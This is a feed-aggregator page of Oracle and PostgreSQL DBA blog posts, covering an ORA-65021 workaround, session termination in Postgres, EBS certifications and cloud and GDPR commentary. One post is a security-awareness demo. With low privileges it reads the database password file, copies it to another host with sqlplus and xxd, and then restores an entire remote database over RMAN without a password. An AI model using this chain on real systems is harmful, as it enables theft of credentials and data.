Feed aggregator

alter table xxx shrink not reclaiming space

Tom Kyte - Tue, 2018-01-09 03:06
Dear Ask Tom Team, I hope you had wonderful vacations and happy new year!!! I have question related to Table's Space Reclaiming using "shrink" command. There are some fragmented tables in our DB. I found their current size and wasted space u...
Categories: DBA Blogs

Changing dbms_job to dbms_scheduler

Tom Kyte - Tue, 2018-01-09 03:06
Hi Tom, I have a requirement where I need to change dbms_job functionality to dbms_scheduler.Regarding that I have few query : 1.The existing dbms_job.submit_job is called within loop which calls certain procedure ex: for I in 1..10 dbms_job.su...
Categories: DBA Blogs

Export application through command prompt

Tom Kyte - Tue, 2018-01-09 03:06
I have moved some pages from one application to another, but when exporting the application through the application itself, some components of the application are not working. So can you provide an alternative way to export the application through command p...
Categories: DBA Blogs

ORA-01722: invalid number ORA-06512: in "SYS.DBMS_SQL" - Fetching cursor with bind variables

Tom Kyte - Tue, 2018-01-09 03:06
Hi, I'm trying to run the following PL/SQL block: DECLARE v_trad_cur CLOB; v_trad_par VARCHAR2 (1000); cur PLS_INTEGER := DBMS_SQL.open_cursor; fdbk NUMBER; retorn VARCHAR2 (1000); vd...
Categories: DBA Blogs

pdb_to_apppdb.sql returns ORA-65021- A workaround

Oracle in Action - Tue, 2018-01-09 01:26

While exploring Oracle Multitenant Application Containers, I learnt that in order to convert a regular PDB to an application PDB, you need to:

  • Clone the regular PDB into an application root
  • Connect to the cloned PDB and execute $ORACLE_HOME/rdbms/admin/pdb_to_apppdb.sql to convert it to an application PDB

However, when I connected to the cloned PDB remotely using @… and executed the script pdb_to_apppdb.sql, I got ORA-65021:

SQL>@$ORACLE_HOME/rdbms/admin/pdb_to_apppdb

...

SQL>create or replace view sys.cdb$common_root_objects&pdbid sharing=object as
  2  select u.name owner, o.name object_name, o.type# object_type, o.namespace nsp,
  3         o.subname object_subname, o.signature object_sig,
  4         decode(bitand(o.flags, &sharing_bits),
  5                &edl+&mdl, 'EDL', &dl, 'DL', 'MDL') sharing
  6    from sys.obj$ o, sys.user$ u
  7   where o.owner#=u.user# and bitand(o.flags, &sharing_bits) <> 0
  8     and bitand(o.flags,&fedobjflag)=&fedobjflag;
old   1: create or replace view sys.cdb$common_root_objects&pdbid sharing=object as
new   1: create or replace view sys.cdb$common_root_objects4 sharing=object as
old   4:        decode(bitand(o.flags, &sharing_bits),
new   4:        decode(bitand(o.flags, (65536+131072+4294967296)),
old   5:               &edl+&mdl, 'EDL', &dl, 'DL', 'MDL') sharing
new   5:               4294967296+65536, 'EDL', 131072, 'DL', 'MDL') sharing
old   7:  where o.owner#=u.user# and bitand(o.flags, &sharing_bits) <> 0
new   7:  where o.owner#=u.user# and bitand(o.flags, (65536+131072+4294967296)) <> 0
old   8:    and bitand(o.flags,&fedobjflag)=&fedobjflag
new   8:    and bitand(o.flags,134217728)=134217728
create or replace view sys.cdb$common_root_objects4 sharing=object as
*
ERROR at line 1:
ORA-65021: illegal use of SHARING clause

After repeated trials, I realized that connecting to the cloned PDB with “alter session set container …” results in successful execution.

Here is the full article where I encountered this error and found out the workaround.

I faced a similar issue while creating an application seed from an application root, and resolved it the same way: by connecting to the application seed with “alter session set container …”.

Conclusion: In order to execute the script $ORACLE_HOME/rdbms/admin/pdb_to_apppdb.sql and convert a cloned regular PDB to an application PDB, connect to the target PDB by switching the container (do not connect remotely using @).
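
For illustration, a minimal sketch of the working approach; the connection and the PDB name APP_PDB1 are hypothetical:

-- Illustrative only: switch the container instead of connecting remotely with @
SQL> connect / as sysdba
SQL> alter session set container = APP_PDB1;
SQL> @$ORACLE_HOME/rdbms/admin/pdb_to_apppdb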


Copyright © ORACLE IN ACTION [pdb_to_apppdb.sql returns ORA-65021- A workaround], All Right Reserved. 2018.

The post pdb_to_apppdb.sql returns ORA-65021- A workaround appeared first on ORACLE IN ACTION.

Categories: DBA Blogs

Partner Webcast – Accelerate Your Digital Transformation in the Cloud with Oracle Visual ...

With increasing demands for modern business applications that will serve specific business needs, and the proliferation of data sources, the speed at which IT departments address line of business...

We share our skills to maximize your revenue!
Categories: DBA Blogs

Announcing Offline Persistence Toolkit for JavaScript Client Applications

OTN TechBlog - Mon, 2018-01-08 19:27

We are excited to announce the open source release on GitHub of the offline-persistence-toolkit for JavaScript client applications, developed by the Oracle JavaScript Extension Toolkit (Oracle JET) team.

The Offline Persistence Toolkit is a client-side JavaScript library that provides caching and offline support at the HTTP request layer. This support is transparent to the user and is done through the Fetch API and an XHR adapter. HTTP requests made while the client device is offline are captured for replay when connection to the server is restored. Additional capabilities include a persistent storage layer, synchronization manager, binary data support and various configuration APIs for customizing the default behavior.

Whilst the toolkit is primarily intended for hybrid mobile applications created using Oracle JET, it can be used within any JavaScript client application that requires persistent storage and/or offline data access.

The Offline Persistence Toolkit simplifies life for application developers by providing a response caching solution that works well across modern browsers and web views. The toolkit covers common caching cases with a minimal amount of application-specific coding, but provides flexibility to cover non-trivial cases as well. In addition to providing the ability to cache complete response payloads, the toolkit supports "shredding" of REST response payloads into objects that can be stored, queried and updated on the client while offline.

The architecture diagram illustrates the major components of the toolkit and how an application interacts with it.

The Offline Persistence Toolkit is distributed as an npm package consisting of AMD modules.

To install the toolkit, enter the following command at a terminal prompt in your app’s top-level directory:

$ npm install @oracle/offline-persistence-toolkit

 

The toolkit makes heavy use of the Promise API. If you are targeting environments that do not support the Promise API, you will need to polyfill this feature. We recommend the es6-promise polyfill.

The toolkit does not have a dependency on a specific client-side storage solution, but does include a PouchDB adapter. If you plan to use PouchDB for your persistent store, you will need to install the following PouchDB packages:

$ npm install pouchdb pouchdb-find

 

For more information about how to make use of this toolkit in your Oracle JET application or any other JavaScript application, refer to the toolkit's README, which also provides details about why we developed this toolkit, how to include it into your app, some simple use cases and links to JS Doc and more advanced use cases.

You can also refer to the JET FixItFast sample app that makes use of the toolkit.  You can refer directly to the source code and even use the Oracle JET command line interface to build and deploy the app to see how it works.

I hope you find this toolkit really useful and if you have any feedback, please submit issues on GitHub.

For more technical articles about the Offline Persistence Toolkit, Oracle JET and other products, you can also follow OracleDevs on Medium.com.

Safari 11 on macOS Sierra and OS X El Capitan Certified with EBS 12

Steven Chan - Mon, 2018-01-08 13:11

Oracle E-Business Suite Release 12 (12.1.3, 12.2.4 or higher) is now certified with Safari 11 on the following desktop configurations.

For macOS Sierra 10.12:

  • macOS Sierra version 10.12.6 or higher
  • Safari version 11 (11.0.2 or higher)
  • Oracle JRE 8 plugin (1.8.0_121 or higher)

For OS X El Capitan 10.11:

  • OS X El Capitan 10.11.6 or higher
  • Safari version 11 (11.0.2 or higher)
  • Oracle JRE 8 plugin (1.8.0_91 or higher)

Users should review all relevant information along with other specific patching requirements and known limitations listed in:

Pending Certification 

macOS High Sierra 10.13 with Safari 11 is not yet certified for E-Business Suite. This certification is in our plans.

Oracle's Revenue Recognition rules prohibit us from discussing certification and release dates, but you're welcome to monitor or subscribe to this blog. I'll post updates here as soon as they're available.

Related Articles

Categories: APPS Blogs

How to cancel SQL statements and disconnect sessions in #PostgreSQL

The Oracle Instructor - Mon, 2018-01-08 12:29

In PostgreSQL, you can cancel problem statements or terminate offending sessions remotely with PG_CANCEL_BACKEND and PG_TERMINATE_BACKEND. This article shows how you can do it with working examples.

edb=# select current_database,current_user;
 current_database | current_user 
------------------+--------------
 edb              | enterprisedb
(1 row)

I’m connected as superuser. The demo is done with EDB Postgres Advanced Server 10.1.5 but the shown technique should work the same with other Postgres distributions and older versions. First I create a demo user:

edb=# create role adam password 'adam' login;
CREATE ROLE
edb=# grant connect on database edb to adam;
GRANT

Now opening another session with that new user:

-bash-4.2$ psql -U adam
Password for user adam: 
psql.bin (10.1.5)
Type "help" for help.

edb=> begin
edb$> loop
edb$> null;
edb$> end loop;
edb$> end;

That session burns CPU now in an endless loop. Back to the superuser session:

edb=# select pid,usename,query
edb-# from pg_catalog.pg_stat_activity where datname='edb';
  pid  |   usename    |                         query                         
-------+--------------+-------------------------------------------------------
 14346 | adam         | begin                                                +
       |              | loop                                                 +
       |              | null;                                                +
       |              | end loop;                                            +
       |              | end;
  5517 | enterprisedb | select pid,usename,query                             +
       |              | from pg_catalog.pg_stat_activity where datname='edb';
(2 rows)

This cancels the SQL statement of one session:

edb=# select pg_cancel_backend(14346);
 pg_cancel_backend 
-------------------
 t
(1 row)

The session that was doing the endless loop gets this output:

ERROR:  canceling statement due to user request
CONTEXT:  edb-spl function inline_code_block line 3 at NULL

This disconnects a single session:

edb=# select pg_terminate_backend(14346);
 pg_terminate_backend 
----------------------
 t
(1 row)

The disconnected session gets this output after trying to do anything:

edb=> \d
FATAL:  terminating connection due to administrator command
server closed the connection unexpectedly
	This probably means the server terminated abnormally
	before or while processing the request.
The connection to the server was lost. Attempting reset: Succeeded.

This way you cancel all SQL statements of a certain user:

edb=# select pg_cancel_backend(pid) from pg_stat_activity where usename='adam';

This way you disconnect all sessions of a certain user:

edb=# select pg_terminate_backend(pid) from pg_stat_activity where usename='adam';

In the unlikely event that your end users are connected with psql, it will try to reconnect them. That’s the background of the output listed above: “… Attempting reset: Succeeded.” means the session got reconnected. If you want to prevent that particular user from (re-)connecting, you need to do this additionally:

edb=# revoke connect on database edb from adam;
REVOKE ROLE

Remember to also revoke from public if you haven’t done that already, otherwise the above revoke doesn’t show any effect:

edb=# revoke connect on database edb from public;
REVOKE

Now this disconnects all sessions of one user, and the above prevents new connections by that user:

edb=# select pg_terminate_backend(pid) from pg_stat_activity where usename='adam';
 pg_terminate_backend 
----------------------
 t
(1 row)

The terminated session then gets this output:

edb=> \d
FATAL:  terminating connection due to administrator command
server closed the connection unexpectedly
	This probably means the server terminated abnormally
	before or while processing the request.
The connection to the server was lost. Attempting reset: Failed.

Keep in mind that the revoke is impacting the whole user, not just one particular session. In other words no session with that user can be established subsequently until you say:

edb=# grant connect on database edb to adam;
GRANT ROLE

You can terminate all sessions connected to one particular database – except your own session – like this:

edb=# select pg_terminate_backend(pid)
edb-# from pg_stat_activity
edb-# where datname='edb' and pid<>pg_backend_pid;

Once again, this does not prevent new sessions from connecting. So either you REVOKE CONNECT on the user layer as shown above, or you do it on the database layer.

This is how normal users are prevented from connecting to the database:

edb=# alter database edb with connection limit 0;
ALTER DATABASE

Superusers can still connect. The above is the equivalent of ALTER SYSTEM ENABLE RESTRICTED SESSION in Oracle. This is what normal users get now upon trying to connect:

-bash-4.2$ psql -U adam
Password for user adam: 
psql.bin: FATAL:  too many connections for database "edb"

The default of an unlimited number of sessions allowed to connect can be set back like this:

edb=# alter database edb with connection limit -1;
ALTER DATABASE

This also prevents superusers from connecting to a database, but you must not be connected to that database yourself:

edb=# alter database edb with allow_connections false;
ERROR:  cannot disallow connections for current database

So either you connect to another existing database in the cluster or you create another database temporarily:

edb=# create database dummy;
CREATE DATABASE
edb=# \c dummy
You are now connected to database "dummy" as user "enterprisedb".
dummy=# alter database edb with allow_connections false;
ALTER DATABASE

Now both normal users and superusers get this output when trying to connect:

psql.bin: FATAL:  database "edb" is not currently accepting connections

The default, that connections to that database are allowed, can be set back with this command:

dummy=# alter database edb with allow_connections true;
ALTER DATABASE
dummy=# \c edb
You are now connected to database "edb" as user "enterprisedb".
edb=# drop database dummy;
DROP DATABASE

What I especially like about this functionality is the option to remotely cancel a particular (ongoing) statement without having to terminate the session that runs it. I’m not aware of a supported way to do that in Oracle. It can be done if Resource Manager has been configured appropriately beforehand, but that requires quite some effort and doesn’t work out of the box.
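
For comparison, here is a rough sketch of the Resource Manager setup alluded to above: a plan directive that switches statements running longer than 60 seconds to the built-in CANCEL_SQL group. All names are illustrative, the plan still has to be activated, and sessions have to be mapped to the consumer group, which is exactly the extra effort mentioned.

begin
  dbms_resource_manager.create_pending_area;
  dbms_resource_manager.create_plan(
    plan    => 'CANCEL_LONG_SQL_PLAN',            -- hypothetical plan name
    comment => 'demo: cancel long-running SQL');
  dbms_resource_manager.create_consumer_group(
    consumer_group => 'LIMITED_GROUP',            -- hypothetical consumer group
    comment        => 'demo group');
  dbms_resource_manager.create_plan_directive(
    plan             => 'CANCEL_LONG_SQL_PLAN',
    group_or_subplan => 'LIMITED_GROUP',
    comment          => 'cancel statements running longer than 60 seconds',
    switch_group     => 'CANCEL_SQL',             -- built-in group: cancels the statement only
    switch_time      => 60);
  dbms_resource_manager.create_plan_directive(
    plan             => 'CANCEL_LONG_SQL_PLAN',
    group_or_subplan => 'OTHER_GROUPS',           -- mandatory catch-all directive
    comment          => 'catch-all');
  dbms_resource_manager.validate_pending_area;
  dbms_resource_manager.submit_pending_area;
end;
/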


Tagged: PostgreSQL
Categories: DBA Blogs

Oracle Statement

Oracle Press Releases - Mon, 2018-01-08 10:56
Press Release
Oracle Statement

Redwood Shores, Calif.—Jan 8, 2018

“We are pleased that the Court of Appeals affirmed the judgment on Rimini Street’s infringement of all 93 of Oracle’s copyrights in this case. Copyright infringement is at the core of Oracle’s dispute with Rimini, and the Court of Appeals affirmed all of the trial court’s and the jury’s findings that Rimini blatantly violated copyright law. We look forward to the trial court issuing a permanent injunction against Rimini for its egregious and illegal conduct.”

—Deborah Hellinger, Vice President, Corporate Communications, Oracle
About Oracle

The Oracle Cloud offers complete SaaS application suites for ERP, HCM and CX, plus best-in-class database Platform as a Service (PaaS) and Infrastructure as a Service (IaaS) from data centers throughout the Americas, Europe and Asia. For more information about Oracle (NYSE: ORCL), please visit us at www.oracle.com.

Trademarks

Oracle and Java are registered trademarks of Oracle and/or its affiliates. Other names may be trademarks of their respective owners.

DISTINCT clause and nulls

Tom Kyte - Mon, 2018-01-08 08:46
I have a table Test_Null with columns A, B and Data Present Inside Table is: SQL>select * from test_null; A B ---------- ------ 1 NULL 2 NULL 3 NULL 4 NULL Query SELECT DI...
Categories: DBA Blogs

ORA-01417 when outer joining many tables in 11g but not 12c

Tom Kyte - Mon, 2018-01-08 08:46
Hi, I ran the below statement in 12c and 11g databases. select * from temp0101 a ,temp0101 b ,temp0101 c where 1 = 1 and a.sno = b.sno(+) and c.sno = b.sno(+); In 12c it executed successfully but in 11g it threw the below error...
Categories: DBA Blogs

Partner Webcast - Data Archives (Tape)

Data Archives (Tape) - When you...

We share our skills to maximize your revenue!
Categories: DBA Blogs

Happy New Year to my blog readers

Anthony Shorten - Sun, 2018-01-07 16:25

Welcome to 2018 for the ShortenSpot readers. This year is looking like another exciting year for the Oracle Utilities Application Framework and a new direction for the blog overall. In the past the blog has been a mixture of announcements and some advice with examples. Whilst it will still provide important technical announcements, this year we plan to publish much more advice, with plenty of example code to illustrate some amazing features you can use in cloud, hybrid and on-premise implementations, to inspire you to use the facilities provided to you.

This year we will also be doing a major refit of all the whitepapers, including rationalizing their number (it was fast approaching 50 at one stage) and making them more relevant with more examples. This will also remove the duplication those whitepapers have with the online documentation, which is now the main source of implementation advice. The whitepapers will act more as supplemental material, complementary to the online documentation.

The next few months are the busy months as we also prepare for the annual Edge conferences in the USA, APAC and Europe, which will include a technical stream with a series of sessions on major technical features and some implementation advice. This year we decided to make it more beneficial for you by focussing on key implementation challenges and offering advice on how to solve implementation issues and business requirements. Each session will cover capabilities, offer general direction and share advice garnered from our cloud implementations and from our implementations and partners over the years. Hopefully you can come back from the sessions with some useful advice. The details of the 2018 Oracle Utilities Edge Customer Conference Product Forum are located at this site.

This year looks like an amazing year and I look forward to publishing a lot more often this year to benefit us all.

 

Review at amazon: Kubernetes: Up & Running

Dietrich Schroff - Sun, 2018-01-07 10:44
Between Christmas and New Year I read Kubernetes: Up & Running.

The authors state:
"This practical guide shows you how Kubernetes and container technology can help you achieve new levels of velocity, agility, reliability, and efficiency."
I think, yes - this is a practical guide, but at only 166 pages it is far too short to give relevant insights into Kubernetes. There are many commands and YAML files shown, but the book lacks a didactic structure: some chapters can only be understood if you have already read later chapters.

But for only 25€ you get a good start, if you are willing to read the book twice ;-)

If you are interested, take a look at my review at amazon.com. (This time amazon.de refused my review. ;-)

Why Cloud? The reason changed in 2017…twice

Look Smarter Than You Are - Fri, 2018-01-05 10:13
In 2017, the predominant reason companies considered moving to the Cloud changed multiple times. While the “how” tends to shift frequently, seeing the “why” fundamentally shift twice in one year was fascinating (though not quite as fascinating as yesterday when LinkedIn suggested I might know both Jessica Alba and Ashton Kutcher).

The Cloud will save us money
2017 started off with companies moving to the Cloud to save money. This makes sense in theory: you pay as you go for your software instead of paying all up front, you don’t have to buy your own servers, there’s no need to do installations, and there’s no IT staff needed to handle the frequent maintenance that an on-premises solution requires.

But while that’s 100% correct in the abstract (any new company would buy Cloud first before ever considering an on-prem product), there’s a sunk cost issue with existing solutions: companies already paid for all their software (minus the annual “support maintenance”), they already bought their servers, someone already installed the software, and there’s an existing staff dedicated to maintaining servers that has plenty of other things they can be doing once they stop dealing with the drudgery of daily maintenance activities. While there’s money to be saved with new solutions, and there’s definitely money to be saved in the long-run on converting existing implementations to the Cloud, the short-term savings are trumped by the sunk cost fallacy.

As companies started moving en masse to the Cloud, a compelling new motivation began appearing in Spring of 2017.

Let’s make our server someone else’s problem
Companies began realizing that servers and data centers are a huge headache: a distraction from their core competencies. Trying to make sure servers stay up and running whenever we need to access them shouldn’t be any more of a focus than starting our car: the engine should always work and if it doesn’t, someone far more qualified than we are should fix it.

All of a sudden, people were going to the Cloud so they never had to deal with their servers again: uptime was assumed, patches were someone else’s problem, and backups just happened. And as this happened, the Cloud became more like Google: when was the last time you pondered where Google’s servers are located or when the last time was that Google did a backup? And the reason you don’t invest brain power into Google maintenance thought experiments is that it’s Google’s problem. While the Cloud may be causing someone else sleepless nights keeping those servers up and running, that someone is not making their problem your problem.

So, we spent the next several months of “The Year of the Cloud” (trademark pending) going to the Cloud so we never had to deal with our servers again.

Power to the People!
In late 2017, organizations going to the Cloud began to notice something weird: business people were starting to own their own systems and access their data directly. A noble aim long desired by users everywhere, this has heretofore been impossible because on-premises systems take a lot of effort to administrate. It took consultants or IT personnel to build the systems, modify them, and in the end, those same people controlled access to the systems.

The Cloud changed all that: with a new focus on end users and self-service, the power to change things (add an account, build a new report, modify a form, create new analysis) moved to the people who are the first to know when a change needs to be made. At first, I thought this self-service paradigm would increase the workload on the business, but it turns out that they were having to do all the requesting of the changes anyway, and quickly making those changes themselves was far faster. Why should I have to make a request to see my own data rather than just go wander through it on my own (preferably on a mobile device)?

And so we ended 2017 with a new drive – a new “why” – of the Cloud. Give the power to the people. The other reasons aren’t lost: they just took a backseat to the new user-first world of the Cloud. Now when someone asks me “why should our company move to the Cloud?”, I tell them “because it gives your business people the power to make better business decisions faster.”

At least, that’s my answer at the start of 2018.

What’s the next shift?
Each year, I conduct a global survey of Business Analytics. Last year, I asked over 250 companies how they were doing in the world of reporting, analysis, planning, and consolidation.  If you want to see where the next shift is coming from before it happens, I’m unveiling the results of this year’s survey on a webcast January 31, 2018, at 2PM Eastern, where you’ll learn how your BI & EPM (Business Intelligence & Enterprise Performance Management) stacks up against the rest of the world. To register, go to:


If you have any questions, ask them in the comments or tweet them to me @ERoske.
Categories: BI & Warehousing

RMOUG Training Days 2018 early registration deadline rapidly approaching

Bobby Durrett's DBA Blog - Fri, 2018-01-05 10:02

The deadline for early registration for RMOUG Training Days 2018 is rapidly approaching. The deadline is January 12. The early registration fee is $385 for RMOUG members and $450 for non-members. There is a packed agenda over the three-day event. The hotel costs are reasonable at $159/night, which is very good compared to the hotel prices at the vendor conferences in San Francisco. RMOUG offers reasonably priced, high-quality training. With all of the change going on with cloud computing and some of the database systems that are competing with Oracle now, I am looking forward to hearing from other people about how they are adapting in this changing climate.

I am giving two talks which are both about personal development for DBAs. One is about whether a DBA should learn the Python programming language. The other is about whether DBAs could benefit from communication and leadership training through Toastmasters. Here are the dates and times for my two talks:

Toastmasters for the Oracle DBA
Thursday, February 22
Session 12, 1:30 pm – 2:30 pm

Python for the Oracle DBA
Thursday, February 22
Session 14, 4:00 pm – 5:00 pm

As things change it makes sense for DBAs to continue to develop themselves and I think that my talks and the conference in general will help us to move forward by preparing us to meet the challenges that the future will bring. I hope to see you in Denver and don’t forget to register by January 12.

Bobby

 

Categories: DBA Blogs

Keep your orapw password file secure

Yann Neuhaus - Fri, 2018-01-05 06:02

This is a small demo I did when I found a database password file (orapw) lying around in /tmp with -rw-rw-rw- permissions, to show why this is a bad idea. People think that the orapw file only contains hashes to validate a given password, and forget that it can be used to connect to a remote database without a password.

I can easily imagine why the orapw file was there in /tmp. To build a standby database, you need to copy the password file to the standby server. If you don’t have direct access to the oracle user, but only sudo access for ‘security reasons’, you can’t scp easily. So you copy the file to /tmp, make it readable by all users, and scp it with your own user.

In this demo I don’t even have access to the host. I only have access to connect to a PDB with the SCOTT user, created with utlsampl.sql, plus one additional privilege: read access on $ORACLE_HOME/dbs:

SQL> connect sys/oracle@//192.168.56.122/PDB1 as sysdba

Connected.

SQL> create or replace directory DBS as '/u01/app/oracle/product/12.2.0/dbhome_1/dbs';

Directory DBS created.

SQL> grant read on directory DBS to SCOTT;

Grant succeeded.

People tend to grant many privileges, and think that read access on a directory which is supposed to contain only configuration files is harmless. Let’s see what you can do from another server.

Get the orapw file from a remote connection

I connect with SCOTT which can read from ORACLE_HOME/dbs:

SQL> connect scott/tiger@//192.168.56.122/PDB1

Connected.

SQL> show user

USER is "SCOTT"

SQL> select * from all_directories;

OWNER DIRECTORY_NAME DIRECTORY_PATH ORIGIN_CON_ID

----- -------------- -------------- -------------

SYS DBS /u01/app/oracle/product/12.2.0/dbhome_1/dbs 4

I create a table to read this file (other possibilities: utl_file, external tables, …):

SQL> create table DEMO ( b blob );

Table DEMO created.

SQL> insert into demo values ( bfilename('DBS','orapwCDB1') );

1 row inserted.

I’m on another server with the same version of Oracle Database software installed.

I use sqlplus to retrieve the server file to my client:

sqlplus -s scott/tiger@//192.168.56.120/PDB1 <<EOF | xxd -p -r > $ORACLE_HOME/dbs/orapwCDB1

set pages 0 lin 17000 long 1000000000 longc 16384

select * from DEMO;

exit

EOF

This (documented by Laurent Schneider) uses sqlplus to display the BLOB as hexadecimal code and xxd (installed with vim-common) to revert it to binary.

So, on my server I have a copy of the database password file for the database I want to steal:

[oracle@VM122 ~]$ strings /u01/app/oracle/product/12.2.0/dbhome_1/dbs/orapwCDB1

ORACLE Remote Password file

X)l)|

SYSDG

+933k\

SYSBACKUP

f ts6 $9

SYSKM

Pull

A nice feature of 12c is the ability to pull backups from a service. With this, it is the destination that connects to the source (I have diagrams to explain it here). It is an easy alternative to RMAN DUPLICATE (see MOS Doc ID 2283978.1 Creating a Physical Standby database using RMAN restore from service). And one difference is that you don’t have to provide the password:

I prepare a small init.ora and directory for the datafiles

echo "db_name=CDB1" > $ORACLE_HOME/dbs/initCDB1.ora

mkdir -p /u01/oradata/CDB1
I’m still on my server with the copy of the remote orapw file and a network access to the source database and I just restore it, without the need for a password:

RMAN> connect target /

connected to target database (not started)

I start a local instance:

RMAN> startup nomount force

Oracle instance started

Total System Global Area 859832320 bytes

Fixed Size 8798552 bytes

Variable Size 784338600 bytes

Database Buffers 58720256 bytes

Redo Buffers 7974912 bytes

I restore the controlfile:

RMAN> restore controlfile from service '//192.168.56.122/CDB1';

Starting restore at 05-JAN-18

using target database control file instead of recovery catalog

allocated channel: ORA_DISK_1

channel ORA_DISK_1: SID=262 device type=DISK

channel ORA_DISK_1: starting datafile backup set restore

channel ORA_DISK_1: using network backup set from service //192.168.56.122/CDB1

channel ORA_DISK_1: restoring control file

channel ORA_DISK_1: restore complete, elapsed time: 00:00:02

output file name=/u01/oradata/CDB1/control01.ctl

output file name=/u01/fast_recovery_area/CDB1/control02.ctl

Finished restore at 05-JAN-18

That’s the interesting part: the restore has to connect to the source database, at least as SYSOPER, but I didn’t provide any password.

I mount this controlfile locally:

RMAN> alter database mount;

Statement processed

released channel: ORA_DISK_1

And now it is easy to pull the whole database (the CDB with all its PDBs) to my local server:

RMAN> restore database from service '//192.168.56.122/CDB1';

Starting restore at 05-JAN-18

Starting implicit crosscheck backup at 05-JAN-18

allocated channel: ORA_DISK_1

channel ORA_DISK_1: SID=262 device type=DISK

Crosschecked 6 objects

Finished implicit crosscheck backup at 05-JAN-18

Starting implicit crosscheck copy at 05-JAN-18

using channel ORA_DISK_1

Finished implicit crosscheck copy at 05-JAN-18

searching for all files in the recovery area

cataloging files...

cataloging done

List of Cataloged Files

=======================

File Name: /u01/fast_recovery_area/CDB1/autobackup/2018_01_04/o1_mf_s_964524009_f4vzyt59_.bkp

File Name: /u01/fast_recovery_area/CDB1/archivelog/2018_01_04/o1_mf_1_15_f4w5vv19_.arc

File Name: /u01/fast_recovery_area/CDB1/archivelog/2018_01_04/o1_mf_1_16_f4wmm0t8_.arc

File Name: /u01/fast_recovery_area/CDB1/archivelog/2018_01_04/o1_mf_1_14_f4vzjdl1_.arc

using channel ORA_DISK_1

channel ORA_DISK_1: starting datafile backup set restore

channel ORA_DISK_1: using network backup set from service //192.168.56.122/CDB1

channel ORA_DISK_1: specifying datafile(s) to restore from backup set

channel ORA_DISK_1: restoring datafile 00001 to /u01/oradata/CDB1/system01.dbf

channel ORA_DISK_1: restore complete, elapsed time: 00:00:16

channel ORA_DISK_1: starting datafile backup set restore

...
So what?

This is not an issue and is totally expected. In a Data Guard configuration, the primary and standby databases have to communicate with each other and therefore need passwordless authentication. This is done with the password file, and this is the reason why you need to copy it rather than just create another one with the same passwords.

So, the file contains more than just a hash of the password (which is required to validate a password): it probably also includes a key (randomly generated when you create the password file) used for passwordless authentication.
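
As a side note, the administrative users recorded in a password file can be listed from the database; the key used for passwordless authentication is, of course, not exposed there. An illustrative query:

SQL> select username, sysdba, sysoper, sysdg, sysbackup, syskm from v$pwfile_users;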

Then, be careful, and do not give read access to the orapw files. You must secure them in the same way as an ssh key or an encryption wallet. This includes:

  • Do not leave a copy of the orapw file in a shared location
  • Be careful with grants on directories, even for READ
  • Do not grant CREATE ANY DIRECTORY, except for a PDB created with a PATH_PREFIX lockdown (see the sketch below)
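
A minimal sketch of that last point, with hypothetical names and paths: a PDB created with PATH_PREFIX can only create directory objects under the given path, so a READ grant on a directory cannot expose files such as orapw that live outside of it.

-- Illustrative only: all names, passwords and paths are hypothetical
SQL> create pluggable database PDB2 admin user pdbadm identified by oracle
  2  path_prefix = '/u01/oradata/CDB1/PDB2/'
  3  file_name_convert = ('/pdbseed/', '/PDB2/');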
 

The article Keep your orapw password file secure appeared first on Blog dbi services.

GDPR compliant by installing software editors tools?

Yann Neuhaus - Fri, 2018-01-05 02:51

In a few months (25 May 2018) the EU General Data Protection Regulation (GDPR) will come into force and replace the Data Protection Directive 95/46/EC. Its goals are to harmonize data privacy laws across Europe, to protect and empower all EU citizens’ data privacy, and to reshape the way organizations across the region approach data privacy. You can find all information related to GDPR on https://www.eugdpr.org and the official PDF of the Regulation (EU) 2016/679 on https://gdpr-info.eu/

The biggest change of the GDPR compared to the Data Protection Directive 95/46/EC is perhaps its extended jurisdiction, as it applies to all companies processing the personal data of data subjects residing in the Union, regardless of the company’s location. But other key points such as penalties, consent, breach notification, right to access, right to be forgotten, data portability, privacy by design and data protection officers have been added to this Regulation.

From 25 May 2018 on, non-compliant organizations will face heavy penalties in terms of fines and reputation. Indeed, according to the Regulation, non-compliant organizations can be fined up to 4% of annual global turnover or €20 million for breaching the GDPR. However, there is no minimum fine or even an automatic fine in case of violation. To decide whether to impose a fine and its amount, the following items can be taken into consideration: the nature, severity and duration of the violation, the number of persons impacted, the impact on those persons, the measures taken to mitigate the damage, whether it is a first or subsequent breach, and finally the cooperation with the authority to remedy the violation. There is currently no clear procedure for a foreign authority to collect a fine imposed on a Swiss company without presence in the EU.

The impact of the GDPR is worldwide since it doesn’t only affect EU organizations but all companies processing and holding the personal data of data subjects residing in the European Union, regardless of the company’s location. This means that all countries (even Switzerland and the UK) are affected. You can find the official information regarding GDPR provided by the Swiss Confederation on the following link and the current Federal Act on Data Protection here (note: the Swiss Data Protection Act, which is currently under revision, will incorporate key regulations similar to the GDPR). You can find the status of the UK Data Protection Bill on the following link.

According to the GDPR the personal data definition is the following:
Any information related to a natural person or ‘Data Subject’, that can be used to directly or indirectly identify the person. It can be anything from a name, a photo, an email address, bank details, posts on social networking websites, medical information, or a computer IP address.

To protect these personal data, the GDPR has 99 articles divided into 11 chapters. Two of these articles, article 25 (Data protection by design and by default) and article 32 (Security of processing), are usually put forward by software vendors such as Oracle, Microsoft and IBM. These vendors use the articles to promote encryption and anonymization tools, which can make sense depending on the personal data hosted, as the GDPR requires an approach adapted to the nature and scope of the personal data impacted. Indeed, encryption at rest may be appropriate depending on the circumstances, but it is not mandated by the GDPR in every instance.
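
To make this concrete, here is the kind of feature such tools provide, using Oracle Transparent Data Encryption column encryption as an illustrative example (table and column names are hypothetical, and it assumes a keystore has already been created and opened). It addresses encryption at rest for a single column, which is only a small part of GDPR compliance:

-- Illustrative only: encrypt one column holding personal data with TDE
SQL> alter table customers modify (email encrypt using 'AES256');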

In other words, technical tools can help with compliance for a small subset of the Regulation, but the GDPR is mostly about processes related to personal data identification and treatment. You will probably get a better understanding of what I mean by having a look at the two checklists (one for data controllers and one for data processors) provided by the ICO (UK Information Commissioner’s Office) on the following link. After completing the checklist you will get an overall rating, a list of suggested actions and guidance.

 

The article GDPR compliant by installing software editors tools? appeared first on Blog dbi services.
